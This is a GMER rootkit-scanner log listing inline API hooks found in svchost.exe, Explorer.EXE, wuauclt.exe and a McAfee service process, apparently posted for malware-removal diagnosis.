.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00130FDE 

.text           C:\Windows\system32\svchost.exe[2272] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 0013001E 

.text           C:\Windows\system32\svchost.exe[2272] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 0014000A 

.text           C:\Windows\system32\svchost.exe[2520] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 004C0000 

.text           C:\Windows\system32\svchost.exe[2520] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 004C0FD1 

.text           C:\Windows\system32\svchost.exe[2520] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 004C0011 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 002500BA 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 002500A9 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 002500DC 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 002500CB 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 0025006C 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 0025001B 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00250FCA 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 0025008E 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00250F94 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00250047 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00250FA5 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00250036 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 0025007D 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 002500F7 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00250FE5 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00250000 

.text           C:\Windows\system32\svchost.exe[2520] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 00250F59 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00240022 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00240FA1 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00240011 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00240000 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00240FB2 

.text           C:\Windows\system32\svchost.exe[2520] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00240FD7 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00260069 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 0026003D 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00260000 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00260058 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00260FAC 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 0026002C 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0026001B 

.text           C:\Windows\system32\svchost.exe[2520] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00260FD1 

.text           C:\Windows\system32\svchost.exe[2520] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 00270FEF 

.text           C:\Windows\System32\svchost.exe[2560] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00090FEF 

.text           C:\Windows\System32\svchost.exe[2560] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 0009002F 

.text           C:\Windows\System32\svchost.exe[2560] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00090014 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00070096 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00070F50 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00070F1A 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 00070F2B 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00070F97 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00070025 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00070FD4 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00070F6B 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00070FB2 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00070FC3 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00070065 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00070040 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00070F7C 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 000700CC 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00070FE5 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00070000 

.text           C:\Windows\System32\svchost.exe[2560] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000700A7 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00060FC8 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00060049 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00060038 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00060000 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00060FE3 

.text           C:\Windows\System32\svchost.exe[2560] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 0006001D 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00080FA1 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00080FC3 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 0008000A 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00080FB2 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00080054 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00080FDE 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00080FEF 

.text           C:\Windows\System32\svchost.exe[2560] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 0008002F 

.text           C:\Windows\Explorer.EXE[3132] ntdll.dll!NtCreateFile                                                                                 778C4224 5 Bytes  JMP 03630000 

.text           C:\Windows\Explorer.EXE[3132] ntdll.dll!NtCreateProcess                                                                              778C42E4 5 Bytes  JMP 03630FE5 

.text           C:\Windows\Explorer.EXE[3132] ntdll.dll!NtProtectVirtualMemory                                                                       778C4B84 5 Bytes  JMP 0363001B 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!GetStartupInfoW                                                                           76B11929 5 Bytes  JMP 032B0F3F 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!GetStartupInfoA                                                                           76B119C9 5 Bytes  JMP 032B0F50 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateProcessW                                                                            76B11BF3 5 Bytes  JMP 032B0F02 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateProcessA                                                                            76B11C28 5 Bytes  JMP 032B0F13 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!VirtualProtect                                                                            76B11DC3 5 Bytes  JMP 032B0071 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateNamedPipeA                                                                          76B12EF5 5 Bytes  JMP 032B0FCA 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateNamedPipeW                                                                          76B15C0C 5 Bytes  JMP 032B0025 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreatePipe                                                                                76B38E6E 5 Bytes  JMP 032B0F61 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!LoadLibraryExW                                                                            76B39109 5 Bytes  JMP 032B0F8D 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!LoadLibraryW                                                                              76B39362 5 Bytes  JMP 032B0040 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!LoadLibraryExA                                                                            76B394B4 5 Bytes  JMP 032B0FA8 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!LoadLibraryA                                                                              76B394DC 5 Bytes  JMP 032B0FB9 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!VirtualProtectEx                                                                          76B3DBDA 5 Bytes  JMP 032B0F72 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!GetProcAddress                                                                            76B5903B 5 Bytes  JMP 032B00AA 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateFileW                                                                               76B5AECB 5 Bytes  JMP 032B0000 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!CreateFileA                                                                               76B5CE5F 5 Bytes  JMP 032B0FEF 

.text           C:\Windows\Explorer.EXE[3132] kernel32.dll!WinExec                                                                                   76BA5CF7 5 Bytes  JMP 032B0F2E 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegCreateKeyExA                                                                           770539AB 5 Bytes  JMP 03320FC0 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegCreateKeyA                                                                             77053BA9 5 Bytes  JMP 03320047 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegOpenKeyA                                                                               770589C7 5 Bytes  JMP 03320000 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegCreateKeyW                                                                             7706391E 5 Bytes  JMP 03320062 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegCreateKeyExW                                                                           770641F1 5 Bytes  JMP 0332007D 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegOpenKeyExA                                                                             77067C42 5 Bytes  JMP 0332001B 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegOpenKeyW                                                                               7706E2B5 5 Bytes  JMP 03320FE5 

.text           C:\Windows\Explorer.EXE[3132] ADVAPI32.dll!RegOpenKeyExW                                                                             77077BA1 5 Bytes  JMP 0332002C 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_wsystem                                                                                    75807F2F 5 Bytes  JMP 032A0075 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!system                                                                                      7580804B 5 Bytes  JMP 032A0064 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_creat                                                                                      7580BBE1 5 Bytes  JMP 032A002E 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_open                                                                                       7580D106 5 Bytes  JMP 032A000C 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_wcreat                                                                                     7580D326 5 Bytes  JMP 032A0053 

.text           C:\Windows\Explorer.EXE[3132] msvcrt.dll!_wopen                                                                                      7580D501 5 Bytes  JMP 032A001D 

.text           C:\Windows\Explorer.EXE[3132] WS2_32.dll!socket                                                                                      772936D1 5 Bytes  JMP 0338000A 

.text           C:\Windows\Explorer.EXE[3132] WININET.dll!InternetOpenA                                                                              76F34E2B 5 Bytes  JMP 03300000 

.text           C:\Windows\Explorer.EXE[3132] WININET.dll!InternetOpenUrlA                                                                           76F3BFCE 5 Bytes  JMP 03300036 

.text           C:\Windows\Explorer.EXE[3132] WININET.dll!InternetOpenW                                                                              76F6C03E 5 Bytes  JMP 0330001B 

.text           C:\Windows\Explorer.EXE[3132] WININET.dll!InternetOpenUrlW                                                                           76F9D722 5 Bytes  JMP 03300FE5 

.text           C:\Program Files\Common Files\Mcafee\McSvcHost\McSvHost.exe[3172] kernel32.dll!LoadLibraryW                                          76B39362 5 Bytes  JMP 6E4C9AE2 C:\Program Files\Common Files\McAfee\McProxy\mcproxy.dll (McAfee Proxy Service Module/McAfee, Inc.)

.text           C:\Program Files\Common Files\Mcafee\McSvcHost\McSvHost.exe[3172] kernel32.dll!LoadLibraryA                                          76B394DC 5 Bytes  JMP 6E4C9A20 C:\Program Files\Common Files\McAfee\McProxy\mcproxy.dll (McAfee Proxy Service Module/McAfee, Inc.)

.text           C:\Windows\system32\svchost.exe[4576] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00040FEF 

.text           C:\Windows\system32\svchost.exe[4576] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00040025 

.text           C:\Windows\system32\svchost.exe[4576] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00040014 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00010F5C 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00010F77 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 000100E2 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 00010F4B 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00010084 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00010FCA 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 0001001B 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00010F88 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00010073 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00010051 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00010062 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00010036 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00010F99 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 000100FD 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 00010FE5 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00010000 

.text           C:\Windows\system32\svchost.exe[4576] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000100C7 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00060FAB 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00060036 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00060011 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00060000 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00060FC6 

.text           C:\Windows\system32\svchost.exe[4576] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00060FE3 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 0007005B 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00070FD4 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00070000 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00070FC3 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 0007006C 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00070FEF 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 00070025 

.text           C:\Windows\system32\svchost.exe[4576] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 0007004A 

.text           C:\Windows\system32\svchost.exe[4576] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 00080000 

.text           C:\Windows\system32\wuauclt.exe[4900] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 0004000A 

.text           C:\Windows\system32\wuauclt.exe[4900] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 00040FDE 

.text           C:\Windows\system32\wuauclt.exe[4900] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00040FEF 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 000100A2 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00010087 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 000100F3 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 000100CE 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00010F77 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00010FDB 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00010FCA 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00010076 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00010051 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00010FA5 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00010F94 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00010036 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00010F66 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 00010104 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 0001001B 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 0001000A 

.text           C:\Windows\system32\wuauclt.exe[4900] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000100BD 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 00070FAD 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00070FBE 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 00070FE3 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00070000 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 00070038 

.text           C:\Windows\system32\wuauclt.exe[4900] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 0007001D 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00080FA8 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00080FCA 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00080FEF 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00080FB9 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00080F97 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 0008001B 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0008000A 

.text           C:\Windows\system32\wuauclt.exe[4900] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00080036 

.text           C:\Windows\system32\wuauclt.exe[4900] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 000B0000 

.text           C:\Windows\System32\svchost.exe[5112] ntdll.dll!NtCreateFile                                                                         778C4224 5 Bytes  JMP 00040000 

.text           C:\Windows\System32\svchost.exe[5112] ntdll.dll!NtCreateProcess                                                                      778C42E4 5 Bytes  JMP 0004002C 

.text           C:\Windows\System32\svchost.exe[5112] ntdll.dll!NtProtectVirtualMemory                                                               778C4B84 5 Bytes  JMP 00040011 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!GetStartupInfoW                                                                   76B11929 5 Bytes  JMP 00010F58 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!GetStartupInfoA                                                                   76B119C9 5 Bytes  JMP 00010F69 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateProcessW                                                                    76B11BF3 5 Bytes  JMP 00010F3D 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateProcessA                                                                    76B11C28 5 Bytes  JMP 000100CA 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!VirtualProtect                                                                    76B11DC3 5 Bytes  JMP 00010FA6 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateNamedPipeA                                                                  76B12EF5 5 Bytes  JMP 00010025 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateNamedPipeW                                                                  76B15C0C 5 Bytes  JMP 00010FDE 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreatePipe                                                                        76B38E6E 5 Bytes  JMP 00010F7A 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!LoadLibraryExW                                                                    76B39109 5 Bytes  JMP 00010FC3 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!LoadLibraryW                                                                      76B39362 5 Bytes  JMP 00010065 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!LoadLibraryExA                                                                    76B394B4 5 Bytes  JMP 00010076 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!LoadLibraryA                                                                      76B394DC 5 Bytes  JMP 00010054 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!VirtualProtectEx                                                                  76B3DBDA 5 Bytes  JMP 00010F8B 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!GetProcAddress                                                                    76B5903B 5 Bytes  JMP 00010F22 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateFileW                                                                       76B5AECB 5 Bytes  JMP 0001000A 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!CreateFileA                                                                       76B5CE5F 5 Bytes  JMP 00010FEF 

.text           C:\Windows\System32\svchost.exe[5112] kernel32.dll!WinExec                                                                           76BA5CF7 5 Bytes  JMP 000100B9 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_wsystem                                                                            75807F2F 5 Bytes  JMP 0006003F 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!system                                                                              7580804B 5 Bytes  JMP 00060FB4 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_creat                                                                              7580BBE1 5 Bytes  JMP 0006001D 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_open                                                                               7580D106 5 Bytes  JMP 00060FEF 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_wcreat                                                                             7580D326 5 Bytes  JMP 0006002E 

.text           C:\Windows\System32\svchost.exe[5112] msvcrt.dll!_wopen                                                                              7580D501 5 Bytes  JMP 00060000 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegCreateKeyExA                                                                   770539AB 5 Bytes  JMP 00070F94 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegCreateKeyA                                                                     77053BA9 5 Bytes  JMP 00070FB9 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegOpenKeyA                                                                       770589C7 5 Bytes  JMP 00070FEF 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegCreateKeyW                                                                     7706391E 5 Bytes  JMP 00070036 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegCreateKeyExW                                                                   770641F1 5 Bytes  JMP 00070F79 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegOpenKeyExA                                                                     77067C42 5 Bytes  JMP 00070FCA 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegOpenKeyW                                                                       7706E2B5 5 Bytes  JMP 0007000A 

.text           C:\Windows\System32\svchost.exe[5112] ADVAPI32.dll!RegOpenKeyExW                                                                     77077BA1 5 Bytes  JMP 00070025 

.text           C:\Windows\System32\svchost.exe[5112] WS2_32.dll!socket                                                                              772936D1 5 Bytes  JMP 000C0FE5 



---- User IAT/EAT - GMER 1.0.15 ----



